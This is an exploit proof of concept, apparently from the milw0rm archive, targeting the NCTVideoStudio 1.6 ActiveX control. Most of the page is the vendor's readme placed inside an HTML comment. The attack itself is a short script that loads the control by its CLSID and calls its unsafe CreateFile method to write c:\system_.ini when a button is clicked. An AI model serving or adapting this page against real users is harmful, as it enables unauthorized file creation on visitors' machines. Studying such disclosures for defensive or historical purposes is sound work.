NCTVideoStudio ActiveX DLLs 1.6 - Insecure Method File Creation

<HTML>
<b> NCTVideoStudio ActiveX DLLs Version 1.6 Insecure Method File Creation </b>
<b>   <br/><br/>
 Author : Mountassif Moad a.k.a Stack    <br/>  <br/>  <br/>
 
<b/>
RegKey Safe for Script: False<br/>
RegKey Safe for Init: False<br/>
Implements IObjectSafety: True<br/>
IDisp Safe:  Safe for untrusted: caller,data  <br/><br/><br/>
<!--  
       Read Me :d:)
       NCTVideoStudio is the package of ActiveX DLL's, which is intended for work with video data.
      NCTVideoStudio includes the following ActiveX DLL's:
    - NCTAudioFile2 which allows you to read and write audio files;
    - NCTAudioRecord2 which allows you to record audio from any audio source device installed in the system;
    - NCTAudioPlayer2 which allows you to play audio data;
    - NCTAudioTransform2 which allows you to apply various effects and transformations to audio data;
    - NCTImageFile which allows you to load and save image files;
    - NCTVideoCompose which allow you to compose video frames using specified effects;
    - NCTVideoCompress which allows you to compress video frames in memory;
    - NCTVideoDxCapture which allows you to capture video and audio from any video source devices (including DV cameras, Webcams and TV tuners);
    - NCTVideoDxPlayer which allows you to preview video files;
    - NCTVideoFile which allows you to read and write video files of various formats;
    - NCTVideoPlayer  which allow you to playback video file;
    - NCTVideoTransform  which allows you to apply different photographic filters, effects, transformations to video frames;
    - NCTVideoView which allows you to visualize video frames;
    - NCTWMVBroadcast which allow you to broadcast video data via network;
 
    - under Windows 98/Me/NT/2000/XP
------------------------------------------------------------------------------------------------
INSTALLATION:
  run NCTVideoStudio.exe
------------------------------------------------------------------------------------------------
SYSTEM REQUIREMENTS:
  Any Win32 based platform (except WinCE);
  Any developer environment which supports COM objects manipulation;
------------------------------------------------------------------------------------------------
SUPPORT:
 You can send any questions, comments and suggestions to support@nctsoft.com
------------------------------------------------------------------------------------------------
INFORMATION:
 Visit main product page at http://www.nctsoft.com/products/NCTVideoStudio/
------------------------------------------------------------------------------------------------
hats new in Release 1.4.1
The general features of NCTVideoStudio news are:
New control for video data broadcast (NCTWMVBroadcastService).  It allows to broadcast video data via network.
New control for video composing (NCTVideoCompose).  It allows to compose video frames using specified effects.
Some changes in the NCTVideoFile control:
New methods
        GetKeyFrameCount;
        GetKeyFrameNum;
        IsKeyFrame;
Modified method
        SetAVIAudioFormatPCM;
Modified event
        ParsingVideoFile;
Change in the NCTVideoTransform control:
added the EffectDeinterlace method.
Fixed founded bugs.
 -->
<BODY>
<object classid='clsid:6ED74AE3-8066-4385-AABA-243E033F75A3' id='test'></object>
<SCRIPT>
/*
RegKey Safe for Script: khatae
RegKey Safe for Init: khatae
Implements IObjectSafety: Sahih
IDisp Safe:  Safe for untrusted: caller,data 
*/
function Mm()
 {
     File = "c:\\system_.ini"
   test.CreateFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Mm() type=button value="Click Here For Test Exploit"><br>
</body>
</HTML>

# milw0rm.com [2009-01-26]